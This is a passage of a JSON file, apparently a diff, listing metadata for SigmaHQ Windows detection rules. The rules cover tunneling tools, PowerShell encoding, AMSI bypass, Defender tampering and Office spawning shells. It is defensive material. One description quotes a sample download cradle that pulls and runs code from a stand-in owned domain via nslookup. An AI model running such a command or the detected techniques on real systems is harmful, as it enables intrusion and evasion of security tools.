"https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-20-638.jpg", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_non_priv_reg_or_ps.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2020/10/05", - "filename": "proc_creation_win_non_priv_reg_or_ps.yml", - "author": "Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of NPS a port forwarding tool", - "uuid": "68d37776-61db-42f5-bf54-27e87072d17e", - "value": "NPS Tunneling Tool", - "meta": { - "refs": [ - "https://github.com/ehang-io/nps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nps.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1090" - ], - "creation_date": "2022/10/08", - "filename": "proc_creation_win_nps.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of powershell in conjunction with nslookup as a mean of download.", - "uuid": "1b3b01c7-84e9-4072-86e5-fc285a41ff23", - "value": "Nslookup PowerShell Download", - "meta": { - "refs": [ - "https://twitter.com/Alh4zr3d/status/1566489367232651264", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/09/05", - "filename": "proc_creation_win_nslookup_poweshell_download.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "This rule tries to detect powershell download cradles, e.g. powershell . (nslookup -q=txt http://some.owned.domain.com)[-1]", - "uuid": "72671447-4352-4413-bb91-b85569687135", - "value": "Nslookup PwSh Download Cradle", - "meta": { - "refs": [ - "https://twitter.com/alh4zr3d/status/1566489367232651264", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105", - "attack.t1071.004" - ], - "creation_date": "2022/09/06", - "filename": "proc_creation_win_nslookup_pwsh_download_cradle.yml", - "author": "Zach Mathis (@yamatosecurity)", - "level": "medium", - "falsepositive": "No established falsepositives", - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)", - "uuid": "2afafd61-6aae-4df4-baed-139fa1f4c345", - "value": "Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)", - "meta": { - "refs": [ - "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.003" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_ntdsutil_usage.yml", - "author": "Thomas Patzke", - "level": "medium", - "falsepositive": [ - "NTDS maintenance" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", - "uuid": "349d891d-fef0-4fe4-bc53-eee623a15969", - "value": "Use Short Name Path in Command Line", - "meta": { - "refs": [ - "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", - "https://twitter.com/frack113/status/1555830623633375232", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ], - "creation_date": "2022/08/07", - "filename": "proc_creation_win_ntfs_short_name_path_use_cli.yml", - "author": "frack113, Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image detection", - "uuid": "a96970af-f126-420d-90e1-d37bf25e50e1", - "value": "Use Short Name Path in Image", - "meta": { - "refs": [ - "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", - "https://twitter.com/frack113/status/1555830623633375232", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_image.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ], - "creation_date": "2022/08/07", - "filename": "proc_creation_win_ntfs_short_name_path_use_image.yml", - "author": "frack113, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", - "uuid": "dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795", - "value": "Use NTFS Short Name in Command Line", - "meta": { - "refs": [ - "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", - "https://twitter.com/jonasLyk/status/1555914501802921984", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_cli.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ], - "creation_date": "2022/08/05", - "filename": "proc_creation_win_ntfs_short_name_use_cli.yml", - "author": "frack113, Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection", - "uuid": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", - "value": "Use NTFS Short Name in Image", - "meta": { - "refs": [ - "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", - "https://twitter.com/jonasLyk/status/1555914501802921984", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_image.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ], - "creation_date": "2022/08/06", - "filename": "proc_creation_win_ntfs_short_name_use_image.yml", - "author": "frack113, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command", - "uuid": "cb5a2333-56cf-4562-8fcb-22ba1bca728d", - "value": "Obfuscated IP Download", - "meta": { - "refs": [ - "https://h.43z.one/ipconverter/", - "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_obfuscated_ip_download.yml" - ], - "tags": [ - "attack.discovery" - ], - "creation_date": "2022/08/03", - "filename": "proc_creation_win_obfuscated_ip_download.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of an encoded/obfuscated version of an IP address (hex, octal...) via commandline", - "uuid": "56d19cb4-6414-4769-9644-1ed35ffbb148", - "value": "Obfuscated IP Via CLI", - "meta": { - "refs": [ - "https://h.43z.one/ipconverter/", - "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_obfuscated_ip_via_cli.yml" - ], - "tags": [ - "attack.discovery" - ], - "creation_date": "2022/08/03", - "filename": "proc_creation_win_obfuscated_ip_via_cli.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Initial execution of malicious document calls wmic to execute the file with regsvr32", - "uuid": "518643ba-7d9c-4fa5-9f37-baed36059f6a", - "value": "Office Applications Spawning Wmi Cli", - "meta": { - "refs": [ - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", - "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_applications_spawning_wmi_commandline.yml" - ], - "tags": [ - "attack.t1204.002", - "attack.t1047", - "attack.t1218.010", - "attack.execution", - "attack.defense_evasion" - ], - "creation_date": "2021/08/23", - "filename": "proc_creation_win_office_applications_spawning_wmi_commandline.yml", - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Office Applications executing a Windows child process including directory traversal patterns", - "uuid": "868955d9-697e-45d4-a3da-360cefd7c216", - "value": "Office Directory Traversal CommandLine", - "meta": { - "refs": [ - "https://twitter.com/sbousseaden/status/1531653369546301440", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_dir_traversal_cli.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion" - ], - "creation_date": "2022/06/02", - "filename": "proc_creation_win_office_dir_traversal_cli.yml", - "author": "@SBousseaden (idea), Christian Burkard (rule)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).", - "uuid": "e1693bc8-7168-4eab-8718-cdcaa68a1738", - "value": "Office Processes Proxy Execution Through WMIC", - "meta": { - "refs": [ - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", - "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_proxy_exec_wmic.yml" - ], - "tags": [ - "attack.t1204.002", - "attack.t1047", - "attack.t1218.010", - "attack.execution", - "attack.defense_evasion" - ], - "creation_date": "2021/08/23", - "filename": "proc_creation_win_office_proxy_exec_wmic.yml", - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a Windows command and scripting interpreter executable started from Microsoft Word, Excel, Powerpoint, Publisher and Visio", - "uuid": "438025f9-5856-4663-83f7-52f878a70a50", - "value": "Microsoft Office Product Spawning Windows Shell", - "meta": { - "refs": [ - "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100", - "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_shell.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002" - ], - "creation_date": "2018/04/06", - "filename": "proc_creation_win_office_shell.yml", - "author": "Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Initial execution of malicious document calls wmic to execute the file with regsvr32", - "uuid": "04f5363a-6bca-42ff-be70-0d28bf629ead", - "value": "Office Applications Spawning Wmi Cli Alternate", - "meta": { - "refs": [ - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", - "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_spawning_wmi_commandline.yml" - ], - "tags": [ - "attack.t1204.002", - "attack.t1047", - "attack.t1218.010", - "attack.execution", - "attack.defense_evasion" - ], - "creation_date": "2021/08/23", - "filename": "proc_creation_win_office_spawning_wmi_commandline.yml", - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects an executable in the users directory started from Microsoft Word, Excel, Powerpoint, Publisher or Visio", - "uuid": "aa3a6f94-890e-4e22-b634-ffdfd54792cc", - "value": "MS Office Product Spawning Exe in User Dir", - "meta": { - "refs": [ - "sha256=23160972c6ae07f740800fa28e421a81d7c0ca5d5cab95bc082b4a986fbac57c", - "https://blog.morphisec.com/fin7-not-finished-morphisec-spots-new-campaign", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.g0046", - "car.2013-05-002" - ], - "creation_date": "2019/04/02", - "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml", - "author": "Jason Lynch", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects svchost process spawning an instance of an office application. This happens when the initial word application create an instance of one of the office COM objects such as 'Word.Application', 'Excel.Application'...etc. This can be used by malicious actor to create a malicious office document with macros on the fly. (See vba2clr project in reference)", - "uuid": "9bdaf1e9-fdef-443b-8081-4341b74a7e28", - "value": "Svchost Spawning Office Application", - "meta": { - "refs": [ - "https://learn.microsoft.com/en-us/previous-versions/office/troubleshoot/office-developer/automate-word-create-file-using-visual-basic", - "https://github.com/med0x2e/vba2clr", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_svchost_child.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion" - ], - "creation_date": "2022/10/13", - "filename": "proc_creation_win_office_svchost_child.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate usage of office automation via scripting" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a Windows command and scripting interpreter executable started from Microsoft Outlook", - "uuid": "208748f7-881d-47ac-a29c-07ea84bf691d", - "value": "Microsoft Outlook Product Spawning Windows Shell", - "meta": { - "refs": [ - "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100", - "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_outlook_shell.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002" - ], - "creation_date": "2022/02/28", - "filename": "proc_creation_win_outlook_shell.yml", - "author": "Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious execution of \"PDQDeployRunner\" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines", - "uuid": "12b8e9f5-96b2-41e1-9a42-8c6779a5c184", - "value": "Suspicious Execution Of PDQDeployRunner", - "meta": { - "refs": [ - "https://twitter.com/malmoeb/status/1550483085472432128", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml" - ], - "tags": [ - "attack.execution" - ], - "creation_date": "2022/07/22", - "filename": "proc_creation_win_pdqdeploy_runner_susp_children.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate use of the PDQDeploy tool to execute these commands" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect use of PDQ Deploy remote admin tool", - "uuid": "d679950c-abb7-43a6-80fb-2a480c4fc450", - "value": "Use of PDQ Deploy Remote Adminstartion Tool", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1072/T1072.md", - "https://www.pdq.com/pdq-deploy/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pdq_deploy.yml" - ], - "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1072" - ], - "creation_date": "2022/10/01", - "filename": "proc_creation_win_pdq_deploy.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt", - "uuid": "ec88289a-7e1a-4cc3-8d18-bd1f60e4b9ba", - "value": "Persistence Via TypedPaths - CommandLine", - "meta": { - "refs": [ - "https://twitter.com/dez_/status/1560101453150257154", - "https://forensafe.com/blogs/typedpaths.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_persistence_typed_paths.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/08/22", - "filename": "proc_creation_win_persistence_typed_paths.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "uuid": "b2400ffb-7680-47c0-b08a-098a7de7e7a9", - "value": "Pingback Backdoor", - "meta": { - "refs": [ - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel", - "https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pingback_backdoor.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1574.001" - ], - "creation_date": "2021/05/05", - "filename": "proc_creation_win_pingback_backdoor.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Very unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of an executable that is typically used by PlugX for DLL side loading started from an uncommon location", - "uuid": "aeab5ec5-be14-471a-80e8-e344418305c2", - "value": "Executable Used by PlugX in Uncommon Location", - "meta": { - "refs": [ - "http://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/", - "https://countuponsecurity.com/2017/06/07/threat-hunting-in-the-enterprise-with-appcompatprocessor/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_plugx_susp_exe_locations.yml" - ], - "tags": [ - "attack.s0013", - "attack.defense_evasion", - "attack.t1574.002" - ], - "creation_date": "2017/06/12", - "filename": "proc_creation_win_plugx_susp_exe_locations.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", - "uuid": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", - "value": "Possible Privilege Escalation via Service Permissions Weakness", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", - "https://pentestlab.blog/2017/03/31/insecure-registry-permissions/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_possible_privilege_escalation_via_service_reg_perm.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1574.011" - ], - "creation_date": "2019/10/26", - "filename": "proc_creation_win_possible_privilege_escalation_via_service_reg_perm.yml", - "author": "Teymur Kheirkhabarov", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Request to amsiInitFailed that can be used to disable AMSI Scanning", - "uuid": "30edb182-aa75-42c0-b0a9-e998bb29067c", - "value": "Powershell AMSI Bypass via .NET Reflection", - "meta": { - "refs": [ - "https://twitter.com/mattifestation/status/735261176745988096", - "https://www.hybrid-analysis.com/sample/0ced17419e01663a0cd836c9c2eb925e3031ffb5b18ccf35f4dea5d586d0203e?environmentId=120", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_amsi_bypass.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2018/08/17", - "filename": "proc_creation_win_powershell_amsi_bypass.yml", - "author": "Markus Neis", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects audio capture via PowerShell Cmdlet.", - "uuid": "932fb0d8-692b-4b0f-a26e-5643a50fe7d6", - "value": "Audio Capture via PowerShell", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md", - "https://eqllib.readthedocs.io/en/latest/analytics/ab7a6ef4-0983-4275-a4f1-5c6bd3c31c23.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_audio_capture.yml" - ], - "tags": [ - "attack.collection", - "attack.t1123" - ], - "creation_date": "2019/10/24", - "filename": "proc_creation_win_powershell_audio_capture.yml", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate audio capture by legitimate user." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Base64 encoded Shellcode", - "uuid": "2d117e49-e626-4c7c-bd1f-c3c0147774c8", - "value": "PowerShell Base64 Encoded Shellcode", - "meta": { - "refs": [ - "https://twitter.com/cyb3rops/status/1063072865992523776", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_b64_shellcode.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027" - ], - "creation_date": "2018/11/17", - "filename": "proc_creation_win_powershell_b64_shellcode.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects specific encoding method of cOnvErTTO-SECUreStRIng in the PowerShell command lines", - "uuid": "74403157-20f5-415d-89a7-c505779585cf", - "value": "Encoded PowerShell Command Line Usage of ConvertTo-SecureString", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_convertto_securestring.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/11", - "filename": "proc_creation_win_powershell_cmdline_convertto_securestring.yml", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the PowerShell command lines with reversed strings", - "uuid": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", - "value": "Suspicious PowerShell Cmdline", - "meta": { - "refs": [ - "https://2019.offzone.moscow/ru/report/hunting-for-powershell-abuses/", - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=66", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/11", - "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the PowerShell command lines with special characters", - "uuid": "d7bcd677-645d-4691-a8d4-7a5602b780d1", - "value": "Suspicious PowerShell Command Line", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=64", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/15", - "filename": "proc_creation_win_powershell_cmdline_special_characters.yml", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)", - "level": "high", - "falsepositive": [ - "Unlikely", - "Amazon SSM Document Worker", - "Windows Defender ATP" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects specific combinations of encoding methods in the PowerShell command lines", - "uuid": "cdf05894-89e7-4ead-b2b0-0a5f97a90f2f", - "value": "Encoded PowerShell Command Line", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_specific_comb_methods.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/11", - "filename": "proc_creation_win_powershell_cmdline_specific_comb_methods.yml", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", - "level": "low", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects specific combinations of encoding methods in the PowerShell command lines", - "uuid": "5b572dcf-254b-425c-a8c5-d9af6bea35a6", - "value": "Suspicious Xor PowerShell Command Line", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_susp_comb_methods.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2022/07/06", - "filename": "proc_creation_win_powershell_cmdline_susp_comb_methods.yml", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", - "level": "medium", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects base64 encoded \"MpPreference\" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV", - "uuid": "c6fb44c6-71f5-49e6-9462-1425d328aee3", - "value": "Powershell Defender Base64 MpPreference", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://twitter.com/AdamTheAnalyst/status/1483497517119590403", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_base64.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/03/04", - "filename": "proc_creation_win_powershell_defender_base64.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Possible Admin Activity", - "Other Cmdlets that may use the same parameters" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects requests to disable Microsoft Defender features using PowerShell commands", - "uuid": "1ec65a5f-9473-4f12-97da-622044d6df21", - "value": "Powershell Defender Disable Scan Feature", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", - "https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE", - "https://www.virustotal.com/gui/search/content%253A%2522Set-MpPreference%2520-Disable%2522/files", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/03/03", - "filename": "proc_creation_win_powershell_defender_disable_feature.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Possible Admin Activity", - "Other Cmdlets that may use the same parameters" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets", - "uuid": "17769c90-230e-488b-a463-e05c08e9d48f", - "value": 